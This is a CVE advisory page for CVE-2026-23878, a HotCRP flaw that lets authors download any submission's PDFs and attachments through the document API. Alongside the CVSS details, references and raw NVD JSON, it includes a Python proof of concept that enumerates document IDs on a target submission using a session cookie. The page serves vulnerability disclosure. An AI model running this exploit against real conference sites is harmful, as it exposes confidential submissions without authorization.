Security Vulnerability Report
CVE-2026-23878 CVSS 6.5 MEDIUM

CVE-2026-23878

Published: 2026-01-19 19:16:05
Last Modified: 2026-02-05 18:39:15

Description

HotCRP is conference review software. Starting in commit aa20ef288828b04550950cf67c831af8a525f508 and prior to commit ceacd5f1476458792c44c6a993670f02c984b4a0, authors with at least one submission on a HotCRP site could use the document API to download any documents (PDFs, attachments) associated with any submission. The problem was patched in commit ceacd5f1476458792c44c6a993670f02c984b4a0.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:hotcrp:hotcrp:3.1:*:*:*:*:*:*:* - VULNERABLE
HotCRP < commit ceacd5f1476458792c44c6a993670f02c984b4a0
HotCRP >= commit aa20ef288828b04550950cf67c831af8a525f508

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2026-23878 PoC - HotCRP Unauthorized Document Access
# Target: HotCRP instances with vulnerable versions
# Requirement: Valid author account with at least one submission
import requests
import sys
from concurrent.futures import ThreadPoolExecutor, as_completed


def download_document(base_url, session_cookie, submission_id, document_id):
    """Attempt to download document from HotCRP"""
    url = f"{base_url}/api/docdownload"
    cookies = {'HotCRP.session': session_cookie}
    params = {
        'p': submission_id,
        'doc': document_id
    }
    try:
        response = requests.get(url, params=params, cookies=cookies, timeout=10)
        if response.status_code == 200 and len(response.content) > 0:
            return {
                'submission_id': submission_id,
                'document_id': document_id,
                'size': len(response.content),
                'content_type': response.headers.get('Content-Type', 'unknown')
            }
    except Exception:
        return None
    return None


def main():
    if len(sys.argv) < 4:
        print("Usage: python poc.py <base_url> <session_cookie> <target_submission_id>")
        print("Example: python poc.py https://conference.org 1a2b3c4d... 123")
        sys.exit(1)

    base_url = sys.argv[1].rstrip('/')
    session = sys.argv[2]
    target_id = int(sys.argv[3])

    print(f"[*] Scanning for documents on submission {target_id}...")

    # Scan document IDs (typically 1-100)
    results = []
    with ThreadPoolExecutor(max_workers=10) as executor:
        futures = [executor.submit(download_document, base_url, session, target_id, doc_id)
                   for doc_id in range(1, 101)]
        for future in as_completed(futures):
            result = future.result()
            if result:
                results.append(result)
                print(f"[+] Found document ID {result['document_id']} ({result['size']} bytes)")

    print(f"\n[*] Total documents accessible: {len(results)}")
    print("[*] Vulnerability confirmed: Unauthorized document access possible")


if __name__ == "__main__":
    main()
```

References

https://github.com/kohler/hotcrp/commit/aa20ef288828b04550950cf67c831af8a525f508 (Patch)
https://github.com/kohler/hotcrp/commit/ceacd5f1476458792c44c6a993670f02c984b4a0 (Patch)
https://github.com/kohler/hotcrp/security/advisories/GHSA-vh3x-xwj4-jvqx (Vendor Advisory)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-23878",
    "sourceIdentifier": "[email protected]",
    "published": "2026-01-19T19:16:04.963",
    "lastModified": "2026-02-05T18:39:14.693",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "HotCRP is conference review software. Starting in commit aa20ef288828b04550950cf67c831af8a525f508 and prior to commit ceacd5f1476458792c44c6a993670f02c984b4a0, authors with at least one submission on a HotCRP site could use the document API to download any documents (PDFs, attachments) associated with any submission. The problem was patched in commit ceacd5f1476458792c44c6a993670f02c984b4a0."
      },
      {
        "lang": "es",
        "value": "HotCRP es un software de revisión de conferencias. A partir del commit aa20ef288828b04550950cf67c831af8a525f508 y antes del commit ceacd5f1476458792c44c6a993670f02c984b4a0, los autores con al menos una entrega en un sitio de HotCRP podían usar la API de documentos para descargar cualquier documento (PDFs, adjuntos) asociado con cualquier entrega. El problema fue parcheado en el commit ceacd5f1476458792c44c6a993670f02c984b4a0."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {"lang": "en", "value": "CWE-201"}
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:hotcrp:hotcrp:3.1:*:*:*:*:*:*:*",
                "matchCriteriaId": "C49A46B9-6C68-43E5-9B50-3C271E236CDE"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/kohler/hotcrp/commit/aa20ef288828b04550950cf67c831af8a525f508",
        "source": "[email protected]",
        "tags": ["Patch"]
      },
      {
        "url": "https://github.com/kohler/hotcrp/commit/ceacd5f1476458792c44c6a993670f02c984b4a0",
        "source": "[email protected]",
        "tags": ["Patch"]
      },
      {
        "url": "https://github.com/kohler/hotcrp/security/advisories/GHSA-vh3x-xwj4-jvqx",
        "source": "[email protected]",
        "tags": ["Vendor Advisory"]
      }
    ]
  }
}
```